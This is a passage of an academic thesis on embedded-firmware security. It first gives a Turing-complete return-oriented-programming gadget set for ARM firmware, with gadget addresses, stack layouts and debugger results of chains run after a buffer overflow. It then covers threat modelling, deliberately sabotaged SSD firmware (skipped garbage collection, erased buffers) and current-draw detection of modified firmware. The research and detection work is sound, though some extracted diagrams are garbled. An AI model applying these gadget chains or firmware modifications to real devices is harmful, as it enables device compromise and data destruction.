0x00000000 top buffer overflow SP of our choosing 0x010083f6 pop {r1, r6, PC} r1 0x01007d50 r6 PC 0x01006990 pop.w {r4, LR} r4 bx r1 LR go after done pop {r0, r1, r3, r6, PC} r0 r1 augend r3 addend r6 PC 0x01005534 add r1, r3 r4 subs r3, r1, 1 r5 str r4, [r0, 8] r6 str r3, [r0, 4] r7 pop {r4, r5, r6, r7} PC bx LR

0xFFFFFFFF bottom Figure 7 – stack diagram (add / add immediate) Figure 2.7: Stack Diagram - add. For all of this gadget’s many statements, the end result is simply adding two operands, which we have placed in just the right locations on the stack, and placing the result in r1. sub: As seen in Figure 2.8, r0 is subtracted from r1 and the difference is stored in r0. r1 = r1 + r3 negate: The gadget for negate is no different from sub. The attacker just needs to ensure

zero is loaded into r1 from the stack in the first command. Thus, negation is performed via subtraction from zero.

not: To perform a not, an attacker could simply load -1 into r1, then use the sub gadget 42 Chapter 2. Return Oriented Programming on Embedded Firmware

subtract

0x00000000 top buffer overflow SP of our choosing 0x01007d50 pop {r0, r1, r3, r6, PC} r0 subtrahend r1 minuend r3 r6 PC 0x01006c96 subs r0, r1, r0 r3 str r0, [r4, 0xC] r4 pop {r3, r4, r5, r6, r7, PC} r5 r6 r7 PC go after done

0xFFFFFFFF bottom

FigureFigure 8 – 2.8:stack Stack diagram (subtract) Diagram - subtract.

This gadget simply subtracts r0 from r1, which we have placed in just the right locations on the stack, and places the result in r0.

r0 = r1 - r0 negate

Negate is the same as subtract, except we must ensure that the minuend, r1, is zero on the stack. The result is:

r0 = 0 - r0 = -r0 2.4. Turing-complete Gadget Set 43

shown in Figure 2.8. As this value is off by 1 from a true not, subtract 1 from r0. After that, Listing 2.7 would come right after to finish the operation.

Listing 2.7: Final part of the not gadget.

1 @ 0x010083f6

2 pop {r1, r6, pc}

3 @ 0x01006990

4 pop.w {r4, lr}

5 bx R1

6 @ 0x010058f2

7 subs r0, r0, 1

8 bx LR

and: The and gadget as shown in Figure 2.9 performs a bitwise and between r2 and r3, storing the result in r2. Again, the link register needed to be set up to maintain continued control over the instruction sequence.

or: Figure 2.10 shows the OR gadget. The values over which a logical OR must be

performed are placed in the r0 and r2 registers. Register r0 gets the result and can then store it into a memory location offset from the address in r1.

branch: A simple pop into the program counter simulates an unconditional jump to the address on the stack.

Conditional Branch: This conditional execution examines the value of r2 which is supplied from the stack by the attacker. If r2 equals 1, the system will branch to the address of condition A, otherwise the branch to condition B will be followed. These branch

addresses will come from the address relative to r0, which will be slightly offset from the stack pointer. This gadget can be seen by examining Figure 2.11.

set less than: The set less than gadget as seen in Figure 2.12 adds the ability to con- and immediate 44 Chapter 2. Return Oriented Programming on Embedded Firmware gand(operand) -> r2 = operand AND r2

0x00000000 top buffer overflow SP of our choosing 0x010032a2 pop {r3, PC} r3 operand 0x010083f6 pop {r1, r6, PC} r1 0x010054bc r6 PC 0x01006990 pop.w {r4, LR} r4 bx r1 LR go after done ands r2, r3 orrs r1, r2 str r1, [r0, 8] PC bx LR

0xFFFFFFFF bottom

Figure Figure9 – 2.9:stack Stack diagram (and Diagram -) and. and 0x00000000 top Buffer overflow gandi(operand) -> r2 = r363 AND operandof our choosing 0x010062d6 pop {r0, r2, r6, pc} ()+' 0x00000000 top r0 Buffer overflow SP r2 of our choosing()+' r6 0x000083e8 pop {r1, r2, r4, r6, PC} r1 PC 0x000054bc0x01006858 orrs r0, r2 r4 str r0, [r1, 0x30] r2 operand PC ( -+(' pop {r4, PC} r0=r0r4 OR r2

r6 0xFFFFFFFF bottom

PC 0x000032a2Figure 2.10: Stack Diagram - 0rpop. {r3, PC} r3 operand PC 0x00006990 pop.w {r4, LR} r4 bx r1 LR go after done ands r2, r3 orrs r1, r2 str r1, [r0, 8] PC bx LR

0xFFFFFFFF bottom Figure 10 – stack diagram (and immediate) 2.4. Turing-complete Gadget Set 45

branch conditional

0x00000000 top buffer overflow SP of our choosing 0x01003ae4 pop {r2, r3, r5, r6, r7, PC} r2 r3 0x010083f6 r5 r6 r7 PC 0x01006698 add r0, SP, 4 r1 0x010059ec blx r3 r6 pop {r1, r6, PC} PC 0x01006990 pop.w {r4, LR} r4 bx r1 LR 0x010083f6 adds r0, 0x20 r1 0x01002fd8 bx LR r6 pop {r1, r6, PC} PC 0x01006990 pop.w {r4, LR} r4 bx r1 LR 0x01000f40 cmp r2, 1 ite eq ldr r0, [r0, 0xC] ldr r0, [r0, 8] bx LR bx r0

0xFFFFFFFF bottom Figure 14 – stack diagram (branch conditional) Figure 2.11: Stack Diagram - conditional branch. This gadget obtains a comparison variable, r2, from the stack, then branches to one of two different memory locations depending on its value compared to 1. 46 Chapter 2. Return Oriented Programming on Embedded Firmware

ditionally set a value that will compare r0 to r1. If r0 is less than r1, it will set r0 to 1, set less than otherwise r0 will be cleared to 0.

0x00000000 top buffer overflow SP of our choosing 0x010083f6 pop {r1, r6, PC} r1 0x01007d50 r6 PC 0x01006990 pop.w {r4, LR} r4 bx r1 LR go after done pop {r0, r1, r3, r6, PC} r0 operand r1 operand r3 r6 PC 0x01006a08 cmp r0, r1 itt ls movs r0, 1 bx LR movs r0, 8 ldr R1, [0x6cc2] str R0, [R1, 0x14] movs R0, 0 bx LR

0xFFFFFFFF bottom

Figure 2.12: Stack Diagram - . Figure 15 – stack diagram (set lessset than) less than

Control Stack Pointer: The final step in making this set of instructions Turing-complete, is to have fine control over the stack pointer. This allows these ROP routines to efficiently be used multiple times without exhausting the memory resources allocated to the stack.

As ROP gadgets are called and executed, the stack pointer (sp) moves down continuously. 2.4. Turing-complete Gadget Set 47

A separate gadget must then be implemented to allow the sp to return back upwards to a specific previous location. When implemented, an attacker is then able to perform repetitious operations, such as for loops, while loops, and recursion. Without this looping ability, an attacker would have to copy repetitive segments of code to the stack the exact number of times that code would need to be executed. Inevitably, they would quickly run out of stack space if even a simple routine needed to be executed a significant number of times.

The included code for controlling the sp does just this. It allows the saving of the stack pointer at the beginning of a repetitious construct into the r0 register. Later, there will need to be a decision made as to whether that construct should repeat, or whether program flow should continue sequentially. The conditional branch gadget will be used to make this decision and, if the stack pointer needs to be reinstated to the beginning of a loop, the final

command in this gadget can take the desired sp address loaded from memory with a load gadget into r0 and then set the sp to that address.

Listing 2.8: Control Stack Pointer.

1 Store initial SP value to be restored later

2 @ 0x01006620

3 mov r0, sp ; blx r2

4 \#Then use store gadget to place r0 in RAM

6 After a conditional branch,

7 one target could be to restore the sp

8 @ 0x01000e74

9 ldr.w sp, [r0] ; bx r1

Delay Loop: We have implemented a delay loop using ROP techniques. This delay loop has the mechanics of a simple loop that merely increments its counter and stops once that counter has reached a pre-determined value. This would be useful for reprogramming the 48 Chapter 2. Return Oriented Programming on Embedded Firmware

flash memory.

To begin, the loop counter variable is set in r5. Figure 2.13 implements a 9 iteration loop and, in each iteration, the repeat condition is determined by a comparison to the value from

r3. So in this example we set r3 to be 9 and r1 to start at 0. On each iteration of the loop r5 is incremented by 1. When r5 equals r3 the branch back up is not taken and instead a branch to the lr is taken instead.

0x00000000 top buffer overflow SP of our choosing 0x01007636 pop {r1, r3, r4, r5, r7, PC} r1 0x01001002 r3 0x01000009 pop.w {r4, LR} r4 bx r1 r5 0x01000000 LDRB r2, [r0, r5] r7 STRB r2, [r1, r5] PC 0x01006990 add.w r5, r5, #1 r4 cmp r5, r3 LR go after done bne #0x0ffe mov r0, r1 bx LR 0xFFFFFFFF bottom

Figure 2.13: Delay Loop.

xor: The real utility of these gadgets is that they can be cleverly tied together to perform more complex or higher level functions. For example, no suitable single xor gadget was found in this code base. However, since all logic gates can be composed of AND and NOT gates, an XOR gadget can be realized through a composition of several primitive building blocks.

The truth table for XOR shows that r0 XOR r1 can be implemented with an OR between two operands. The first operand is r0 AND NOT r1 and the second operand is NOT r0 2.5. Experimental Results 49

AND r1. The stack diagram for this instruction is located in Figure 2.14 which refers the XOR arguments as A and B.

0x00000000 top buffer overflow of our choosing LR 0x01007d50 pop {r0, r1, r3, r6, PC} SP 0x01007d50 pop {r0, r1, r3, r6, PC} r0 argument B r0 argument A r1 0 r1 0 r3 r3 r6 r6 PC 0x01006c96 subs r0, r1, r0 PC 0x01006c96 subs r0, r1, r0 r3 str r0, [r4, 0xC] r3 str r0, [r4, 0xC] r4 pop {r3, r4, r5, r6, r7, PC} r4 pop {r3, r4, r5, r6, r7, PC} r5 r5 r6 r6 r7 r7 PC 0x010083f6 pop {r1, r6, PC} PC 0x010083f6 pop {r1, r6, PC} r1 0x010058f2 r1 0x010058f2 r6 pop.w {r4, LR} r6 pop.w {r4, LR} PC 0x01006990 bx r1 PC 0x01006990 bx r1 r4 subs r0, r0, 1 r4 subs r0, r0, 1 LR 0x010083f6 bx LR LR 0x010083f6 bx LR r1 0x010017c6 pop {r1, r6, PC} r1 0x010017c6 pop {r1, r6, PC} r6 pop.w {r4, LR} r6 pop.w {r4, LR} PC 0x01006990 bx r1 PC 0x01006990 bx r1 r4 movs r2, r0 r4 movs r2, r0 LR 0x010032a2 it ne LR 0x010032a2 it ne r3 argument A movs r0, 1 r3 argument B movs r0, 1 PC 0x010083f6 bx LR PC 0x010083f6 bx LR r1 0x010054bc pop {r3, PC} r1 0x010054bc pop {r3, PC} r6 pop {r1, r6, PC} r6 pop {r1, r6, PC} PC 0x01006990 pop.w {r4, LR} PC 0x01006990 pop.w {r4, LR} r4 bx r1 r4 bx r1 LR 0x01001be8 ands r2, r3 LR 0x01007d50 ands r2, r3 r4 Location - 4 orrs r1, r2 r0 Location - 16 orrs r1, r2 PC 0x01001be6 str r1, [r0, 8] r1 0x01001c8a str r1, [r0, 8] r4 bx LR r3 bx LR PC 0x01006858 pop {r4, PC} r6 pop {r0, r1, r3, r6, PC} r4 load r0, [r4, 4] PC 0x01006990 pop.w {r4, LR} PC go after done pop {r4, PC} r4 bx r1 [r4+0x04] orrs r0, r2 str R2, [R0, 0x10] r0 = 𝐴𝐴𝐵𝐵 str r0, [r1, 0x30] [r0+0x10]= bx LR = 𝐴𝐴𝐵𝐵 + 𝐴𝐴𝐵𝐵 pop {r4, PC} 𝐴𝐴𝐵𝐵 0xFFFFFFFF bottom

Figure 2.14: Stack Diagram - xor.

2.5 Experimental Results

This section shows screen shots taken from the Keil µVision [13] debugger [12] of the program stack containing the ROP chain about to be executed. It also shows the register values both before and after each of the gadgets was executed on an example program. This is to demonstrate to the reader that these gadgets can be used to exploit the target hardware. In each of these cases, a simple buffer overflow was used to take control of the microprocessor and the exploited program as well as the overflow strings are included with the submission 50 Chapter 2. Return Oriented Programming on Embedded Firmware of this article.

For each figure below the left most screen shot of the registers shows their state just before the ROP chain begins executing and the registers on the right show their state after. The memory that contains the stack is shown in between them.

In the case of the store gadget, Figure 2.18, an additional screen shot of the memory con- taining the stack and just below it is shown so that the location where the value was stored can be seen. The move gadget set can be seen in Figure 2.15. The load gadget is shown in Figure 2.16 and the load immediate in Figure 2.17. Figure 2.19 and Figure 2.20 show the add and the subtract gadget. The and gadget is seen in Figure 2.21 with the or gadget in Figure 2.22. Figure 2.23 shows the conditional branch gadget. The set less than gadget is shown in Figure 2.24. The delay loop is shown in Figure 2.25.

Figure 2.15: Move. The value contained in r4 moved to r0. 2.5. Experimental Results 51

Figure 2.16: Load. The value 0xDEADBEEF from memory location 0x020000FA4 to r0. Note that the stack pointer shows the bottom of the stack as 0x20000FC4 before execution begins.

Figure 2.17: Load Immediate. The value 0xDEADBEEF is popped from the stack into r4 and then moved to r0. 52 Chapter 2. Return Oriented Programming on Embedded Firmware

Figure 2.18: Store. The value 0xDEADBEEF is taken from the stack, placed in r0 and then written to memory location 0x20000FA8 which is 12 plus 0x20000F9C.

Figure 2.19: Add. The values 0x02020202 and 0x03030303 from the stack are added together and the result, 0x05050505, is placed in r1. 2.5. Experimental Results 53

Figure 2.20: Sub. The value 0x02020202 is subtracted from 0x03030303 (both values are found on the stack) and the result, 0x01010101, is placed in r0.

Figure 2.21: And. The value 0x11111111 is placed in r3 and anded with the value, 0x76767676 already in r2. The result, 0x10101010 finishes in r2. 54 Chapter 2. Return Oriented Programming on Embedded Firmware

Figure 2.22: Or. The two values 0xAAAAAAAA and 0xCCCCCCCC are taken from the stack and ored with each other. 0xEEEEEEEE is the result of that operation and it is placed in r0. 2.5. Experimental Results 55

Figure 2.23: Conditional Branch. The value 0x00000001 is placed in r2 which indicates to branch to the location found at memory location 0x20001010. If any other value besides 0x00000001 was placed in r2, the branch to the address located at 0x2000100C would have been followed. 56 Chapter 2. Return Oriented Programming on Embedded Firmware

Figure 2.24: Set Less Than. The values 0x00000005 and 0x00000007 are tested. As the first value is less than the second a 0x00000001 is placed in r0. If the first value was not less than the second value, a 0x00000000 would have been placed in r0. 2.5. Experimental Results 57

Figure 2.25: Delay Loop. 0x00000000 is initially loaded into r5 and 0x00000009 is loaded into r3. r5 is incremented until it equals r3 and then the loop finishes. The final value of 0x00000009 can be seen in both r5 and r3. Chapter 3

Security Analysis of Solid State Drive Firmware

3.1 Solid State Drive Security

The techniques outlined in this section are a first step towards detecting and mitigating modifications to the intended operation of embedded firmware. The work presented here focuses on Solid State Drives (SSDs) which can be viewed as a subset of these non-IoT embedded systems. SSDs are secondary storage drives which are increasingly replacing mechanical Hard Disk Drives (HDDs). SSDs improve several issues that plagued mechanical drives, such as random access latency, power consumption, and reliability [31]. To realize these improvements, the physical implementation of SSDs is vastly different than that of HDDs. Instead of storing data on magnetic media, data are stored in an array of NAND flash chips, which significantly changes the nature of data access operations. Traditionally, this would mean that host systems need additional or alternative hardware and software interfaces to interact with these devices. However, to speed up the adoption curve, SSD manufacturers created Flash Transition Layers (FTLs) which run on internal SSD controllers to make an SSD effectively emulate a standard HDD to a host computer.

This FTL makes the SSD an interesting and complex device since the on-board firmware to implement it behaves like an embedded operating system. The firmware is responsible not

58 3.2. Related Work 59 only for reading and writing data to flash memory, but also for performing the unique duties of the SSD such as garbage collection [78], wear leveling [28], and logical block translation [56]. Furthermore, since the firmware contains code running on the device which accepts external inputs, it can be vulnerable to exploitation. Even though SSDs are not themselves networked, their hosts are often part of a network. Thus, they are susceptible to deliberate exploitation by anyone in possession of the device, or by any malware resident on the host system or the connected network. Additionally, a newly installed SSD could already contain malware from a previous owner or through its manufacturing supply chain [20]. These scenarios would have deleterious effects on the confidentiality, integrity, and availability of data stored on an SSD.

The remainder of this chapter is organized as follows. Related work is discussed in section 3.2, including both firmware modification in SSDs and related devices as well as side channel analysis techniques that have been employed on SSDs. The proposed methods and exper- imental setup are presented in sections 3.3 and 3.5, which include a description of the Jasmine OpenSSD board used in this work and the types of modifications being made to its firmware. The firmware classification procedure is described in section 4.1.

3.2 Related Work

This section begins with a review of firmware modification in SSDs and related devices and then examines side channel analysis techniques that have been employed in the context of SSDs.

With the explosion of the Internet of Things (IoT) product space over recent years, re- searchers have identified and investigated a multitude of security weaknesses in the firmware of embedded devices. In 2014, Costin and Zaddach catalogued more than 32,000 firmware 60 Chapter 3. Security Analysis of Solid State Drive Firmware

images across 132 products and found 38 previously unknown vulnerabilities [37]. Looking specifically at conventional hard disk drives, firmware modification attacks were implemented as early as 2013 by [43] and [102]. The latter project used public data and reverse engineering to delineate the layout and operations of the drive’s firmware. They leveraged this infor- mation to hook the reading and writing operations to modify data input and output from the HDD and perform data exfiltration. This backdoor was introduced to the device via a modified firmware update and the authors claim an accompanying overhead of just 1%.

Firmware investigation and exploitation has also targeted solid state drives. In 2015, Bo- gaard and de Bruijn demonstrated the ability to compromise open source SSD firmware on the controller of the Jasmine board from the OpenSSD project [22]. They note that this controller, the Indilinx Barefoot SSD controller [35], is also found in the first generation OCZ Vertex SSDs. Recently, in the context of encryption analysis, researchers have demonstrated the ability to compromise commercially available firmware in both the Crucial and Samsung product lines [70]. Case studies presented included physical access through enabled JTAG debugging ports as well as unsigned code injection and execution.

There has also been work done to detect this kind of malicious activity on other embedded devices [14]. Gonzalez and Hinton used the term power fingerprinting to describe a process of determining the normal operating pattern of a device via side channel analysis [49]. Specifi- cally, they discussed measuring power consumption or electromagnetic emissions. However, their work focuses solely on the electromagnetic emissions method. From this, they char- acterized the device and determined a baseline, then compared known normal samples to samples with modified firmware. Sample traces that differed significantly from the baseline were classified as tampered.

Whereas their power fingerprinting focused on electromagnetic emanations from industrial control systems, our methods are geared towards analyzing power consumption from SSDs 3.2. Related Work 61

[21, 36, 68, 97], which play an important role in the storage and transmission of critical data. As representative examples, Wendt et al. present an automated method to characterize embedded processor instruction sets using power measurements [97]. More recently, energy has been used to classify specific attacks on a Raspberry Pi (meant to be representative of IoT devices in general) [84], and power measurements in combination with network data analysis have been used for dynamic, behavior-based malware detection in a general-purpose computer [51]. As in our work, both of the latter papers utilize machine learning techniques to support classification.

Exploring side channel leakage in SSDs using current measurement is an active area of re- search [100] and the work presented here is part of an ongoing project that utilizes these techniques. Shey et al. demonstrated the ability to use current measurements to identify the presence of TRIM-initiated physical data removal on an SSD [83]. This work also validated the use of a non-invasive current probe. Melton et al. analyzed SSD current to infer the file system in use [71]. By creating signatures based upon spectral and principal compo- nents analysis, and discriminating with a k-nearest neighbors classifier, they were able to differentiate between NTFS, exFAT, FAT32, and EXT4 on two different SSDs. Canclini, McMasters, et al. used a similar current analysis technique to classify whether reads or writes are taking place on an SSD and achieved 100% accuracy in multiple scenarios [27]. Finally, Johnson et al. used current draw analysis to distinguish between different versions of proprietary firmware running on the same commercial SSD [101]. Our work is similar to this, but we modify and analyze an open source SSD implementation to establish ground truth about the differences between firmware versions by observing the characteristics of known code sequences. 62 Chapter 3. Security Analysis of Solid State Drive Firmware

3.3 Jasmine Flash Translation Layers

The OpenSSD project provides an opportunity for researchers to study SSD operations with open source hardware and software, as opposed to the proprietary commercial versions available on the market. The project consists of both the Jasmine SSD development board with a reference implementation of the ARM based Indilinx Barefoot SATA controller [35] and the Cosmos SSD development board which is FPGA based as well as the associated firmware files for each board. The Jasmine board is the focus of this research; it includes 64 MB of SDRAM, 64 GB of NAND flash, 6 GPIO pins, and debugging capabilities through JTAG and UART. There are 4 parallel channels of NAND flash with 8 banks that share an I/O bus and contain two 8-bit flash chips [66].

The Jasmine project includes 5 different versions of its Flash Transition Layer which can be built into the controller firmware and sits between the Host Interface Layer and the Flash Interface Layer. These FTLs are named Dummy, Tutorial, Greedy, Dynamic dAta Clustering, and FASTer. The Dummy FTL was created by Indilinx and is the simplest FTL; it performs no reads or writes to NAND flash, so it is only useful for measuring the speed of communications over SATA and to DRAM. The Tutorial FTL is more capable; it adds a page-mapping function and initializes flash memory during every boot, but it does not include garbage collection. The Greedy FTL adds garbage collection along with the persistence of data across power cycles. This garbage collection recognizes when there is insufficient space for a new write, then chooses the block with the least number of available pages to be a victim block where all of its valid pages will be copied to an empty block and the victim block deleted [56]. The Dynamic dAta Clustering (DAC) FTL reorganizes data into dynamic clusters when a victim block is being cleaned and also during data updates [33]. In contrast to the Greedy strategy, it clusters hot (frequently accessed) pages and cold (rarely accessed) pages separately and performs a cost benefit analysis to determine 3.3. Jasmine Flash Translation Layers 63

Figure 3.1: OpenSSD project Jasmine development board [66]

the victim block for garbage collection. The final FTL is called FASTer and is based on the Fully-associative Sector Translation (FAST) [64] FTL, which performs block address mapping as opposed to page address mapping in the other FTLs. FASTer is optimized for online transaction processing with a method for isolating cold pages and giving valid pages a second chance to be invalidated before being merged to a data block [65]. A training data set is established by loading the Jasmine board firmware with the Greedy Flash Transition Layer provided by the OpenSSD project and a modified version of the Greedy FTL. This data set is then used to build an automated binary classifier to differentiate the operating characteristics of the original firmware from the modified version through current analysis. 64 Chapter 3. Security Analysis of Solid State Drive Firmware

3.4 Threat Model

This research describes a method for detecting modification to firmware on SSDs. The ramifications of such a modification can range from benign to catastrophic. For that reason, it is necessary to consider the threat model of this class of attack in order to properly assess the associated risk. In this section, a threat model is introduced to frame a discussion pertaining to the security of the firmware on an SSD. This is done by describing interactions across three trust boundaries: an Ownership Boundary, an Internet Boundary, and a Physical Boundary.

We use the Microsoft Threat Modeling Tool [85, 91] to generate a visual representation of potential threat actions across these boundaries. In categorizing these potential threats, Microsoft has formulated the STRIDE model [75, 85]. This model groups threats into 6 broad types: spoofing identity, tampering with data, repudiation, information disclosure, denial of service, and elevation of privileges. Out of 51 potential threats identified in the Threat Modeling Tool, we prioritize a smaller subset as high risk due to their applicability to the firmware modification problem set. The majority of these threats involve either spoofing identity or tampering with data as these actions are the most likely methods to give an attacker control of the target firmware. The threat model diagram is included in Fig. 3.2 and will be used to explain the highest risk threats in the remainder of this section.

3.4.1 Ownership Trust Boundary

The Ownership Trust Boundary exists to delineate the fact that owners of SSDs cannot trust the validity of firmware installed prior to their ownership of the device. In reality, most of the responsibility for the integrity of firmware on an SSD is out of the hands of the owner and determined before they ever take possession [20]; an SSD owner has to trust that the product 3.4. Threat Model 65

Figure 3.2: Threat Model of potential modifications to an SSD. 66 Chapter 3. Security Analysis of Solid State Drive Firmware

was delivered with legitimate firmware installed. Unfortunately, there are no manufacturer provided methods to verify the authenticity of the firmware and there are several ways to subvert this trust.

During the initial sale, there are several credible risks of receiving a counterfeit product. First, an insider threat or an outsider with significant influence or resources can tamper with the firmware that ends up in the final product. Secondly, a malicious actor could subvert the supply chain to include a chip with an altered version of firmware, as in the Supermicro example [77]. An attacker could also subvert the manufacturing process to produce an SSD in discord with the design specifications. Finally, it could also be possible for an attacker to switch a legitimate product out for a counterfeit version after manufacturing before it is distributed to a vendor or final owner [20].

Another way for the initial owner of an SSD to receive a counterfeit device is through spoofing the identity of an entity in the production process. An attacker could use social engineering techniques to represent a supplier, manufacturer, or distributor and use that trusted position to replace products with compromised versions [20, 90].

An SSD can also be acquired through the secondary market. SSDs have historically been more expensive than HDDs for the same capacity, so there exist several purchasing options for users who desire the advantages of SSDs without the high cost. Unsurprisingly, these resale options pose additional risks for buyers. For example, there is a risk of a legitimate marketplace being spoofed since resellers share a weak link, if any link at all, with the original manufacturer [42, 55]. It is also difficult for a consumer to assess the validity or intentions of third party vendors either in person, or in online marketplaces such as eBay or Amazon [45]. Alternatively, a tampering risk stems from the fact that the device may have been previously owned or repaired. This access by an unknown party allows a window for the firmware to be modified before the SSD is in possession of the new owner. 3.4. Threat Model 67

3.4.2 Internet Trust Boundary

The Internet Trust Boundary is the interface between the global Internet and the system containing an SSD. It exists to make SSD owners aware that firmware from unauthenticated sources on the Internet should not be implicitly trusted. Once a consumer takes ownership of a legitimate SSD, the device is still at risk of firmware modification due to built-in firmware update mechanisms [70]. Many manufacturers include a way to download and install new firmware to SSDs to provide feature updates or security patches. This can put SSD owners at risk of spoofing and repudiation if they accept and install firmware updates from unknown or weakly authenticated sources [98].

Even if a consumer is vigilant regarding firmware update sources, they face risk due to the vulnerabilities inherent in the system to which the SSD is connected. If a system is compromised by a remote attacker, that attacker may be able to tamper with the SSD firmware by injecting commands to overwrite the legitimate version.

3.4.3 Physical Trust Boundary

The Physical Trust Boundary exists to illustrate the fact that an SSD owner who does not implement appropriate physical access controls cannot be confident in the ongoing integrity of the firmware. Even if a consumer is able to acquire an SSD containing valid firmware and protect their host system from any remote intrusions, they would still need to be mindful of physical security as any attacker with local access still poses significant security risks [70].

Another threat is tampering, which can be achieved via a local elevation of privilege [103]. Flashing new firmware to an SSD requires the use of hardware access commands that require administrative privileges. A local attacker has a variety of options for escalating privileges on a system, the system into an administrative context, or temporarily connecting 68 Chapter 3. Security Analysis of Solid State Drive Firmware the SSD to a system under their control [23, 95]. Once privileges are elevated, a local attacker poses a tampering threat and can make changes to the SSD firmware to achieve their malicious objective.

3.4.4 Threat Model Review

Any level of modification to SSD firmware - regardless of which trust boundary is crossed - leaves that device vulnerable to information disclosure risk. Low-level modifications to the way the SSD operates could allow an attacker to create an exfiltration channel to extract sensitive data from the device to a remote server controlled by the attacker. Further, modi- fication to SSD firmware introduces a tampering risk to the data on the disk. An attacker would have the ability to add, modify, or delete data on the disk. Such a deletion attack is covered in the remainder of this text.

Users who are concerned about the security of their sensitive data need to be aware of threats across Ownership, Internet, and Physical boundaries. This threat model shows that modification of firmware on commercially available SSDs is a practical concern and can be realistically accomplished through a multitude of avenues. It is reasonable to assume that a motivated attacker with sufficient resources can affect some desired modification to the firmware on an SSD. Accordingly, it is critical to possess tools which can detect such modifications and give SSD owners an opportunity for remediation.

3.5 Malicious Code Injection

This section describes the attempts at modifying the authentic Greedy firmware of the Jasmine SSD so that attempts at classifying the original from the modified version could be 3.5. Malicious Code Injection 69 made. These attempts included modifying the times when garbage collection could occur, modifying the contents of NAND flash memory directly, and modifying the contents of the DRAM buffers prior to the occurrence of reads and writes.

3.5.1 Denying Garbage Collection

The first attempt at injecting a malicious payload into the Jasmine Greedy FTL is to change the probability of garbage collection occurring. Ordinarily, garbage collection is triggered when a write request is made but more space must be made in flash memory in order to fit the data. When receiving such a request, the modified code chooses with some probability to simply ignore the garbage collection request. In the absence of a built-in random number generator, the probability of this event was determined by the current bank. Each data channel for the NAND flash controller has access to 8 different banks where data can be written. The garbage collection routine receives the current bank as an argument so that it knows which bank will be the subject of the operation.

Choosing to ignore garbage collection for any particular bank results in a 12.5% chance that any garbage collection request will be skipped. This probability can be increased with 12.5% granularity by choosing to ignore additional banks. In this case, four out of the eight banks are ignored leaving a 50% chance of garbage collection occurring during any request. A view of the original and modified firmware versions is shown in Figure 3.3. After processing the data in the frequency domain and analyzing the resulting bins using PCA, a good separability between the samples is found as shown in Figure 3.4.

This separability, however, is not consistent. New samples that have not been a part of the training data set are classified with a much lower accuracy. It turns out that this method of modification does not cause the noticeable change originally anticipated. Skipping a 70 Chapter 3. Security Analysis of Solid State Drive Firmware

Figure 3.3: Current over time comparison of Greedy and Garbage Collection Modified Greedy firmware requested garbage collection routine does not have a lasting effect, as a new request is immediately made and quickly fulfilled. Since the operation with and without this variation is so operationally similar to the original version, the classifier is distinguishing based on many factors that just happen to align for any particular data set.

3.5.2 Formatting NAND Flash

In an attempt to make a change that would be more consistently evident, the NAND flash is modified directly. There exists a method provided by the Flash Interface Layer to format a given bank of flash. This is a noticeable transient and would also affect the data retrieved from flash memory; some segments of files containing actual data will be cleared.

This solution also does not yield the required outcome. The flash format is a readily appar- ent transient, but formatting an entire bank is more destructive than desired. This method 3.5. Malicious Code Injection 71

Figure 3.4: Unmodified (red crosses) and Garbage Collection modified (blue circles) firmware observations plotted in the space of the first three principal components used in classification. causes deleterious changes to important parts of the filesystem structure and the FTL meta- data area. This causes the SSD to fail during a trial and no longer be recognized by the host operating system. It then needs to be completely reset and reflashed in order to work again.

3.5.3 Clearing DRAM Buffers

As a less destructive method of collecting modified firmware trials, the Greedy FTL was altered to sporadically erase the DRAM read and write buffers. This was accomplished by choosing to erase these buffers with a given probability after every 1000 write requests made to the FTL. For normal trials, no changes were made to the SSD firmware. A successful attack of this nature compromises the integrity and availability of data written to an SSD by a host device. 72 Chapter 3. Security Analysis of Solid State Drive Firmware

Figure 3.5: Current over time comparison of Greedy and Greedy-50% firmware in [24].

The trials were collected in a clustered round robin format, alternating between five trial clusters of normal Greedy FTL firmware and five trial clusters of Modified Greedy FTL firmware. Fig. 3.5 is a plot of the first minute of one recording of the SSD current with Greedy firmware performing normal write operations (top) and a plot of the 50% probability altered version affecting a small subset of write operations (bottom). A full description of this method of modification, including the results, are included in Section 4.2. Even though this modification would be transparent to any host device storing data on the SSD, many of the injected transients can be seen with the naked eye in a time domain data set as shown in the areas above the arrows. Our goal is to formalize the detection of these transients and classify whether or not a device is running the genuine, manufacturer-provided version of firmware. Chapter 4

Detection of Modified Firmware on Solid State Drives

4.1 Detecting Modified Firmware

This section describes both the laboratory setup for collecting Jasmine firmware data as well as the methods for processing the data and creating a classifier.

4.1.1 Data Collection Setup

As shown in Figure 4.1, the data collection rig consists of four main components. The Jasmine SSD board is at the bottom and has been initialized and formatted prior to each trial. The current probe is connected to a common ground reference with the board and is setup to monitor the power supply line. The host system is running the Windows operating system and is loaded with software to flash and initialize the Jasmine board over the SATA connection. Optionally, a serial connection can be made to allow the SSD status to be monitored via UART during the debugging stage. This system also contains the scripts which trigger the data recorder to start and stop collections and to perform the SSD operations which are intended to be observed. Finally, data are collected on a Gen 3i Data Recorder which displays the data during a trial and also saves the raw data to disk for offline analysis.

73 74 Chapter 4. Detection of Modified Firmware on Solid State Drives

Session Control Scripts

Gen 3i Data Recorder

Host System Jasmine Board Current Probe

Figure 4.1: The laboratory setup to write data to the SSD and measure current draw

4.1.2 Data Processing

In this section, we detail how the data which were collected in the previous section can be processed with machine learning techniques to create a classifier to distinguish between two firmware images. In the following sections, we provide the results of these classification efforts and then discuss the implications of a successful classifier for SSD firmware.

A sample of the code used for processing batches of collected data is included in Listing 4.1. 4.1. Detecting Modified Firmware 75

Listing 4.1: Processing Current Draw Data

1 // Developed with the Computer Engineering and Cyber Security Research group at the United States Naval Academy

3 function [results,info] = GenerateMemSysFollowOnResults(rootPath)

5 %CONSTANTS

6 CLASSIFIERS = {'Logistic Regression'; 'Quadratic Discriminant Analysis'; ' 3-Nearest Neighbor'};

7 NUM_TWO_FOLD_CV_RANDOM_SPLITS = 10; %10 ensures that with probability ~99.9% (exactly 100*(1-1/(2^10))) we will observe all four possible combinations of test/train sets. This will manifest itself as up to two unique accuracy values, because 2-fold cross-validation (which takes care of two of the four combos) is happening on each iteration. So final result is achieved by averaging the UNIQUE values obtained over the 10 runs.

9 %MAINPROGRAM

10 results = struct; %initialize structure to hold results

11 numClassifiers = length(CLASSIFIERS);

12 dirListing = dir(rootPath);

13 dirListing = dirListing(~ismember({dirListing.name},{'.','..'}));

14 results.dirNames = {dirListing.name}; clear dirListing; %now results. dirNames holds the name of each individual binary classification experiment's directory

16 %initialize cell array to hold results

17 numExperiments = length(results.dirNames);

18 resultsAll = cell(size(results.dirNames)); %each entry of resultsAll will hold the results of one experiment

